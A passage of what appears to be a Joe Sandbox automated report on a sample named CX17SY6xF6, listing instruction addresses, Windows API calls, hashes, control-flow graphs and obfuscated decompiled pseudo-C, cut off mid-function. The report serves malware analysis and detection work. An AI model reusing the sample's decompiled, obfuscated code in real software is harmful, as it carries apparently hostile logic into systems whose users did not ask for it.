                                                                                                                                                                                                                                                    0x010d2437
                                                                                                                                                                                                                                                    0x010d243e
                                                                                                                                                                                                                                                    0x010d2444
                                                                                                                                                                                                                                                    0x010d244a
                                                                                                                                                                                                                                                    0x010d245e
                                                                                                                                                                                                                                                    0x010d2487
                                                                                                                                                                                                                                                    0x010d248a
                                                                                                                                                                                                                                                    0x010d2490
                                                                                                                                                                                                                                                    0x010d2497
                                                                                                                                                                                                                                                    0x010d24ae
                                                                                                                                                                                                                                                    0x010d24c3
                                                                                                                                                                                                                                                    0x010d24c9
                                                                                                                                                                                                                                                    0x010d24cf
                                                                                                                                                                                                                                                    0x010d24d5
                                                                                                                                                                                                                                                    0x010d24e3
                                                                                                                                                                                                                                                    0x010d24fa
                                                                                                                                                                                                                                                    0x010d2515
                                                                                                                                                                                                                                                    0x010d2518
                                                                                                                                                                                                                                                    0x010d2521
                                                                                                                                                                                                                                                    0x010d252e
                                                                                                                                                                                                                                                    0x010d2549
                                                                                                                                                                                                                                                    0x010d2570
                                                                                                                                                                                                                                                    0x010d2570
                                                                                                                                                                                                                                                    0x010d2572
                                                                                                                                                                                                                                                    0x010d2213
                                                                                                                                                                                                                                                    0x010d2219
                                                                                                                                                                                                                                                    0x010d221f
                                                                                                                                                                                                                                                    0x010d2228
                                                                                                                                                                                                                                                    0x010d2234
                                                                                                                                                                                                                                                    0x010d223d
                                                                                                                                                                                                                                                    0x010d2248
                                                                                                                                                                                                                                                    0x010d224e
                                                                                                                                                                                                                                                    0x010d225a
                                                                                                                                                                                                                                                    0x010d2281
                                                                                                                                                                                                                                                    0x010d228d
                                                                                                                                                                                                                                                    0x010d2290
                                                                                                                                                                                                                                                    0x010d229c
                                                                                                                                                                                                                                                    0x010d22a1
                                                                                                                                                                                                                                                    0x010d22a6
                                                                                                                                                                                                                                                    0x010d22ac
                                                                                                                                                                                                                                                    0x010d22b7
                                                                                                                                                                                                                                                    0x010d22c0
                                                                                                                                                                                                                                                    0x010d22c9
                                                                                                                                                                                                                                                    0x010d22d4
                                                                                                                                                                                                                                                    0x010d22e0
                                                                                                                                                                                                                                                    0x010d22e9
                                                                                                                                                                                                                                                    0x010d22f4
                                                                                                                                                                                                                                                    0x010d2300
                                                                                                                                                                                                                                                    0x010d230c
                                                                                                                                                                                                                                                    0x010d2312
                                                                                                                                                                                                                                                    0x010d2339
                                                                                                                                                                                                                                                    0x010d2345
                                                                                                                                                                                                                                                    0x010d2350
                                                                                                                                                                                                                                                    0x010d2368
                                                                                                                                                                                                                                                    0x010d2386
                                                                                                                                                                                                                                                    0x010d238b
                                                                                                                                                                                                                                                    0x010d2391
                                                                                                                                                                                                                                                    0x010d23a3
                                                                                                                                                                                                                                                    0x010d23a3
                                                                                                                                                                                                                                                    0x010d23ac
                                                                                                                                                                                                                                                    0x010d236a
                                                                                                                                                                                                                                                    0x010d236d
                                                                                                                                                                                                                                                    0x010d2373
                                                                                                                                                                                                                                                    0x010d2379
                                                                                                                                                                                                                                                    0x010d2379
                                                                                                                                                                                                                                                    0x010d23b5
                                                                                                                                                                                                                                                    0x010d23c1
                                                                                                                                                                                                                                                    0x010d23c7
                                                                                                                                                                                                                                                    0x010d2416
                                                                                                                                                                                                                                                    0x010d2416
                                                                                                                                                                                                                                                    0x010d241d
                                                                                                                                                                                                                                                    0x010d23c9
                                                                                                                                                                                                                                                    0x010d23e3
                                                                                                                                                                                                                                                    0x010d23ea
                                                                                                                                                                                                                                                    0x010d23f0
                                                                                                                                                                                                                                                    0x010d23f6
                                                                                                                                                                                                                                                    0x010d23f6
                                                                                                                                                                                                                                                    0x010d2423
                                                                                                                                                                                                                                                    0x010d257f

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 010D2179
                                                                                                                                                                                                                                                    • DdeInitializeA.USER32(0116D5F0,?,?), ref: 010D23EA
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 010D243E
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 010D248A
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 010D2549
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 010D257F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleProcess$ByteCharCloseCurrentExitInitializeModuleMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2062908402-0
                                                                                                                                                                                                                                                    • Opcode ID: b6c6025f279ab1fc4d7794df2f7e10ff81d3c1398170ec5e68ca0d40112307c7
                                                                                                                                                                                                                                                    • Instruction ID: 7de1eb9dbfeba5f3386c51f01ef720ec0427edb74ba4ba1850f292646618af5a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c6025f279ab1fc4d7794df2f7e10ff81d3c1398170ec5e68ca0d40112307c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4922A0B5A002489FDB08CF98D994AAE7BF6FF88304F14822AF9199B355D735E841CF54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 247 10d3e70-10d3ee2 248 10d3ee8-10d3ef3 247->248 249 10d41eb-10d4216 247->249 252 10d40ec-10d411f 248->252 253 10d3ef9-10d3f7d call 10d3450 248->253 250 10d4218-10d4230 249->250 251 10d4233-10d4242 249->251 250->251 254 10d41e9 252->254 255 10d4125-10d4133 252->255 259 10d3f7f-10d3fa5 253->259 260 10d3fa7-10d3fb9 253->260 254->251 258 10d413e-10d4148 255->258 258->254 261 10d414e-10d41e4 CreateFileMappingA 258->261 262 10d3fbf-10d4067 call 10e8570 call 10d47e0 259->262 260->262 261->258 267 10d406c-10d40e7 call 10d14c0 262->267 267->254
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010D3E70() {
                                                                                                                                                                                                                                                    				intOrPtr _t189;
                                                                                                                                                                                                                                                    				intOrPtr _t211;
                                                                                                                                                                                                                                                    				signed int _t224;
                                                                                                                                                                                                                                                    				intOrPtr _t302;
                                                                                                                                                                                                                                                    				intOrPtr _t303;
                                                                                                                                                                                                                                                    				intOrPtr _t304;
                                                                                                                                                                                                                                                    				intOrPtr _t347;
                                                                                                                                                                                                                                                    				intOrPtr* _t348;
                                                                                                                                                                                                                                                    				void* _t350;
                                                                                                                                                                                                                                                    				void* _t359;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t348 = _t350 - 0x60;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x50) =  *((intOrPtr*)(_t348 + 0x74)) + 0xef;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x4c) =  *(_t348 + 0x68) + 0x33;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x54) =  *(_t348 + 0x68) ^ 0x000002dc;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t348 + 0x3c)) =  *((intOrPtr*)(_t348 + 0x6c)) + 0x221;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x48) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x40) =  *(_t348 + 0x70) ^ 0x000026d4;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x58) =  *((intOrPtr*)(_t348 + 0x6c)) - 0x92;
                                                                                                                                                                                                                                                    				 *(_t348 + 0x5c) =  *(_t348 + 0x70) - 0x26d4;
                                                                                                                                                                                                                                                    				if( *(_t348 + 0x50) <  *(_t348 + 0x5c) + 0x2622) {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xc4)) != ( *(_t348 + 0x54) *  *(_t348 + 0x54) |  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc81))) {
                                                                                                                                                                                                                                                    						 *(_t348 + 0x5c) =  *(_t348 + 0x5c) +  *0x0116D6A8 - 0x26d4;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					if( *(_t348 + 0x40) >  *(_t348 + 0x58) + 0x2fb) {
                                                                                                                                                                                                                                                    						_t347 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t302 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t302 + 0xbadc81)) > ( *( *((intOrPtr*)(_t348 + 0x7c)) + 0x78) |  *(_t347 + 0x14)) + 0x2598) {
                                                                                                                                                                                                                                                    							_t189 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    							_t120 = _t189 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t348 + 0x44)) =  *_t120;
                                                                                                                                                                                                                                                    							while( *((intOrPtr*)(_t348 + 0x44)) <=  *(_t348 + 0x5c) *  *(_t348 + 0x5c)) {
                                                                                                                                                                                                                                                    								_t303 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								 *(_t348 - 0x40) = ( *(_t348 + 0x54) &  *(_t303 + 0xbadca9)) *  *(_t348 + 0x58);
                                                                                                                                                                                                                                                    								_t304 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    								 *(_t348 - 0x3c) =  *(_t348 + 0x40) -  *((intOrPtr*)(_t304 + 0xbadbed));
                                                                                                                                                                                                                                                    								 *(_t348 - 0x38) =  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x3c) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xbadc51);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x34) =  *(_t348 + 0x58) &  *( *((intOrPtr*)(_t348 + 0x7c)) + 0x8c);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x30) =  *(_t348 + 0x48) *  *(_t348 + 0x48) |  *(_t348 + 0x50);
                                                                                                                                                                                                                                                    								 *(_t348 - 0x2c) =  *(_t348 + 0x4c) + 0x2598;
                                                                                                                                                                                                                                                    								CreateFileMappingA( *(_t348 - 0x40),  *(_t348 - 0x3c),  *(_t348 - 0x38),  *(_t348 - 0x34),  *(_t348 - 0x30),  *(_t348 - 0x2c));
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t348 + 0x44)) =  *((intOrPtr*)(_t348 + 0x44)) + 4;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x20)) =  *(_t348 + 0x5c) + 0x2633;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x24) =  *(_t348 + 0x58) ^ 0x000001c1;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x28) =  *(_t348 + 0x5c) ^ 0x00002598;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x2c) =  *(_t348 + 0x54) ^ 0x0000013e;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x30)) =  *(_t348 + 0x5c) + 0x2801;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x34)) =  *(_t348 + 0x50) - 0xef;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x38)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x5c) = E010D3450( *((intOrPtr*)(_t348 + 0x20)),  *(_t348 + 0x24),  *(_t348 + 0x28),  *(_t348 + 0x2c),  *((intOrPtr*)(_t348 + 0x30)),  *((intOrPtr*)(_t348 + 0x34)),  *((intOrPtr*)(_t348 + 0x38)));
                                                                                                                                                                                                                                                    						_t211 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t44 = _t211 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    						_t359 =  *_t44 -  *0x116d68c; // 0x14b95e
                                                                                                                                                                                                                                                    						if(_t359 > 0) {
                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x98)) +  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x1c));
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							 *0x116d6cc =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0x10)) -  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x7c)) + 0xe4)) ^  *( *((intOrPtr*)(_t348 + 0x7c)) + 0xdc);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0xc)) =  *(_t348 + 0x4c) + 0x2a2;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x10)) =  *(_t348 + 0x50) - 0x54;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x14)) =  *((intOrPtr*)(_t348 + 0x3c)) + 0x48;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 + 0x18)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x1c) =  *(_t348 + 0x5c) ^ 0x00000111;
                                                                                                                                                                                                                                                    						 *(_t348 + 0x58) = E010E8570( *((intOrPtr*)(_t348 + 0xc)),  *((intOrPtr*)(_t348 + 0x10)),  *((intOrPtr*)(_t348 + 0x14)),  *((intOrPtr*)(_t348 + 0x18)),  *(_t348 + 0x1c));
                                                                                                                                                                                                                                                    						 *(_t348 - 0xc) =  *(_t348 + 0x4c) ^ 0x00000221;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 8)) = 0x116d5f0;
                                                                                                                                                                                                                                                    						 *(_t348 - 4) =  *(_t348 + 0x48) ^ 0x00002565;
                                                                                                                                                                                                                                                    						 *_t348 =  *(_t348 + 0x58) - 0xdc;
                                                                                                                                                                                                                                                    						 *(_t348 + 4) =  *(_t348 + 0x50) ^ 0x000000b4;
                                                                                                                                                                                                                                                    						 *(_t348 + 8) =  *(_t348 + 0x54) ^ 0x00000221;
                                                                                                                                                                                                                                                    						_t224 = E010D47E0( *(_t348 - 0xc),  *((intOrPtr*)(_t348 - 8)),  *(_t348 - 4),  *_t348,  *(_t348 + 4),  *(_t348 + 8)); // executed
                                                                                                                                                                                                                                                    						 *(_t348 + 0x54) = _t224;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x28)) =  *(_t348 + 0x58) + 0x71;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x24) =  *(_t348 + 0x54) ^ 0x00000d9a;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x20)) =  *(_t348 + 0x58) - 0x41;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x1c) =  *(_t348 + 0x5c);
                                                                                                                                                                                                                                                    						 *(_t348 - 0x18) =  *(_t348 + 0x48) ^ 0x0000253b;
                                                                                                                                                                                                                                                    						 *(_t348 - 0x14) =  *(_t348 + 0x50) ^ 0x00000240;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t348 - 0x10)) =  *((intOrPtr*)(_t348 + 0x7c));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x54) = E010D14C0( *((intOrPtr*)(_t348 - 0x28)),  *(_t348 - 0x24),  *((intOrPtr*)(_t348 - 0x20)),  *(_t348 - 0x1c),  *(_t348 - 0x18),  *(_t348 - 0x14),  *((intOrPtr*)(_t348 - 0x10)));
                                                                                                                                                                                                                                                    						 *(_t348 + 0x4c) =  *(_t348 + 0x4c) ^ 0x000003ba;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return  *((intOrPtr*)(_t348 + 0x3c)) + 0x81;
                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                    0x010d3e71
                                                                                                                                                                                                                                                    0x010d3e84
                                                                                                                                                                                                                                                    0x010d3e8d
                                                                                                                                                                                                                                                    0x010d3e99
                                                                                                                                                                                                                                                    0x010d3ea4
                                                                                                                                                                                                                                                    0x010d3eb0
                                                                                                                                                                                                                                                    0x010d3ebc
                                                                                                                                                                                                                                                    0x010d3ec7
                                                                                                                                                                                                                                                    0x010d3ed3
                                                                                                                                                                                                                                                    0x010d3ee2
                                                                                                                                                                                                                                                    0x010d4216
                                                                                                                                                                                                                                                    0x010d4230
                                                                                                                                                                                                                                                    0x010d4230
                                                                                                                                                                                                                                                    0x010d3ee8
                                                                                                                                                                                                                                                    0x010d3ef3
                                                                                                                                                                                                                                                    0x010d40ff
                                                                                                                                                                                                                                                    0x010d4112
                                                                                                                                                                                                                                                    0x010d411f
                                                                                                                                                                                                                                                    0x010d4125
                                                                                                                                                                                                                                                    0x010d412a
                                                                                                                                                                                                                                                    0x010d4130
                                                                                                                                                                                                                                                    0x010d413e
                                                                                                                                                                                                                                                    0x010d4156
                                                                                                                                                                                                                                                    0x010d416a
                                                                                                                                                                                                                                                    0x010d4174
                                                                                                                                                                                                                                                    0x010d4181
                                                                                                                                                                                                                                                    0x010d419c
                                                                                                                                                                                                                                                    0x010d41ab
                                                                                                                                                                                                                                                    0x010d41b8
                                                                                                                                                                                                                                                    0x010d41c3
                                                                                                                                                                                                                                                    0x010d41de
                                                                                                                                                                                                                                                    0x010d413b
                                                                                                                                                                                                                                                    0x010d413b
                                                                                                                                                                                                                                                    0x010d413e
                                                                                                                                                                                                                                                    0x010d3ef9
                                                                                                                                                                                                                                                    0x010d3f02
                                                                                                                                                                                                                                                    0x010d3f0e
                                                                                                                                                                                                                                                    0x010d3f19
                                                                                                                                                                                                                                                    0x010d3f25
                                                                                                                                                                                                                                                    0x010d3f31
                                                                                                                                                                                                                                                    0x010d3f3c
                                                                                                                                                                                                                                                    0x010d3f42
                                                                                                                                                                                                                                                    0x010d3f69
                                                                                                                                                                                                                                                    0x010d3f6c
                                                                                                                                                                                                                                                    0x010d3f71
                                                                                                                                                                                                                                                    0x010d3f77
                                                                                                                                                                                                                                                    0x010d3f7d
                                                                                                                                                                                                                                                    0x010d3fb9
                                                                                                                                                                                                                                                    0x010d3f7f
                                                                                                                                                                                                                                                    0x010d3fa0
                                                                                                                                                                                                                                                    0x010d3fa0
                                                                                                                                                                                                                                                    0x010d3fc7
                                                                                                                                                                                                                                                    0x010d3fd0
                                                                                                                                                                                                                                                    0x010d3fd9
                                                                                                                                                                                                                                                    0x010d3fdf
                                                                                                                                                                                                                                                    0x010d3feb
                                                                                                                                                                                                                                                    0x010d400a
                                                                                                                                                                                                                                                    0x010d4016
                                                                                                                                                                                                                                                    0x010d4019
                                                                                                                                                                                                                                                    0x010d4029
                                                                                                                                                                                                                                                    0x010d4034
                                                                                                                                                                                                                                                    0x010d4040
                                                                                                                                                                                                                                                    0x010d404c
                                                                                                                                                                                                                                                    0x010d4067
                                                                                                                                                                                                                                                    0x010d406f
                                                                                                                                                                                                                                                    0x010d4078
                                                                                                                                                                                                                                                    0x010d4084
                                                                                                                                                                                                                                                    0x010d408d
                                                                                                                                                                                                                                                    0x010d4093
                                                                                                                                                                                                                                                    0x010d409f
                                                                                                                                                                                                                                                    0x010d40ab
                                                                                                                                                                                                                                                    0x010d40b1
                                                                                                                                                                                                                                                    0x010d40d8
                                                                                                                                                                                                                                                    0x010d40e4
                                                                                                                                                                                                                                                    0x010d40e4
                                                                                                                                                                                                                                                    0x010d41e9
                                                                                                                                                                                                                                                    0x010d4242

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 010D41DE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFileMapping
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 524692379-0
                                                                                                                                                                                                                                                    • Opcode ID: d50a478821592120639f7cb15bf7207b8e5fb0049e54ad5dbd9c78ffb6258a70
                                                                                                                                                                                                                                                    • Instruction ID: 7802aa0dc49944faaa7d8869542d9bdfb69e815459441861c8edcb097d8c9bf0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50a478821592120639f7cb15bf7207b8e5fb0049e54ad5dbd9c78ffb6258a70
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01D1E575A00148DFDB18CF98D890AAEBBF5FF88304F50812AFA299B355D735E841CB84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 314 10ddedd-10ddee8 SetUnhandledExceptionFilter
                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010DDEDD() {
                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t1;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t1 = SetUnhandledExceptionFilter(E010DDEE9); // executed
                                                                                                                                                                                                                                                    				return _t1;
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x010ddee2
                                                                                                                                                                                                                                                    0x010ddee8

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000DEE9,010DDAE0), ref: 010DDEE2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 4ea05c97a90df54ad1c1695b81e24182fe8c9e135adfb69bfa9c589bcd0ae184
                                                                                                                                                                                                                                                    • Instruction ID: bc02b13ecd52e754ef6cf7bf46f737738fa9a7b1f1ba0592e6cc7eade00eb567
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ea05c97a90df54ad1c1695b81e24182fe8c9e135adfb69bfa9c589bcd0ae184
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                                                                    			E010DC889(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                    				int _t58;
                                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                                    				short* _t62;
                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                    				short* _t70;
                                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                                    				int _t78;
                                                                                                                                                                                                                                                    				short* _t81;
                                                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                    				int _t98;
                                                                                                                                                                                                                                                    				short* _t101;
                                                                                                                                                                                                                                                    				int _t103;
                                                                                                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                                                                                                    				short* _t107;
                                                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                    				_t49 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                                                                    				_t103 = _a20;
                                                                                                                                                                                                                                                    				if(_t103 > 0) {
                                                                                                                                                                                                                                                    					_t78 = E010DD79E(_a16, _t103);
                                                                                                                                                                                                                                                    					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                    					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                    					_t103 = _t4;
                                                                                                                                                                                                                                                    					if(_t110 >= 0) {
                                                                                                                                                                                                                                                    						_t103 = _t78;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t98 = _a32;
                                                                                                                                                                                                                                                    				if(_t98 == 0) {
                                                                                                                                                                                                                                                    					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                    					_a32 = _t98;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                    				_v12 = _t54;
                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					return E010DDC5F(_v8 ^ _t106);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                    					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                    						_t81 = 0;
                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                    						if(_t81 == 0) {
                                                                                                                                                                                                                                                    							L36:
                                                                                                                                                                                                                                                    							_t105 = 0;
                                                                                                                                                                                                                                                    							L37:
                                                                                                                                                                                                                                                    							E010DA61A(_t81);
                                                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                    						_t121 = _t58;
                                                                                                                                                                                                                                                    						if(_t58 == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t100 = _v12;
